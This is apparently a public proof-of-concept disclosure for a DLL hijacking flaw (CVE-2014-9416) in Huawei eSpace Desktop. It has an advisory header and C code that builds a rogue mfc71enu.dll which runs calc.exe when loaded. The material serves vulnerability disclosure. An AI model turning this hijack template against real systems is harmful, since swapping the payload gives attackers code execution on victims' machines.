53 lines
No EOL
1.6 KiB
C
53 lines
No EOL
1.6 KiB
C
/*
|
||
|
||
Huawei eSpace Desktop DLL Hijacking Vulnerability
|
||
|
||
|
||
Vendor: Huawei Technologies Co., Ltd.
|
||
Product web page: https://www.huawei.com
|
||
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
|
||
|
||
Summary: Create more convenient Enhanced Communications (EC) services for your
|
||
enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
|
||
voice, data, video, and service streams, and provides users with easy and secure
|
||
access to their service platform from any device, in any place, at any time. The
|
||
eSpace Meeting allows you to join meetings that support voice, data, and video
|
||
functions using the PC client, the tablet client, or an IP phone, or in a meeting
|
||
room with an MT deployed.
|
||
|
||
Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
|
||
to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and
|
||
airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
|
||
by tricking a user into opening a related application file (.html, .jpg, .png)
|
||
located on a remote WebDAV or SMB share.
|
||
|
||
Tested on: Microsoft Windows 7 Professional
|
||
|
||
|
||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||
|
||
19.08.2014
|
||
|
||
Patched version: V200R003C00
|
||
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
|
||
CVE ID: CVE-2014-9416
|
||
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
|
||
|
||
*/
|
||
|
||
|
||
// gcc -shared -o mfc71enu.dll exploit.c
|
||
|
||
#include <windows.h>
|
||
|
||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
|
||
{
|
||
exec();
|
||
return 0;
|
||
}
|
||
|
||
int exec()
|
||
{
|
||
WinExec("calc.exe" , SW_NORMAL);
|
||
return 0;
|
||
} |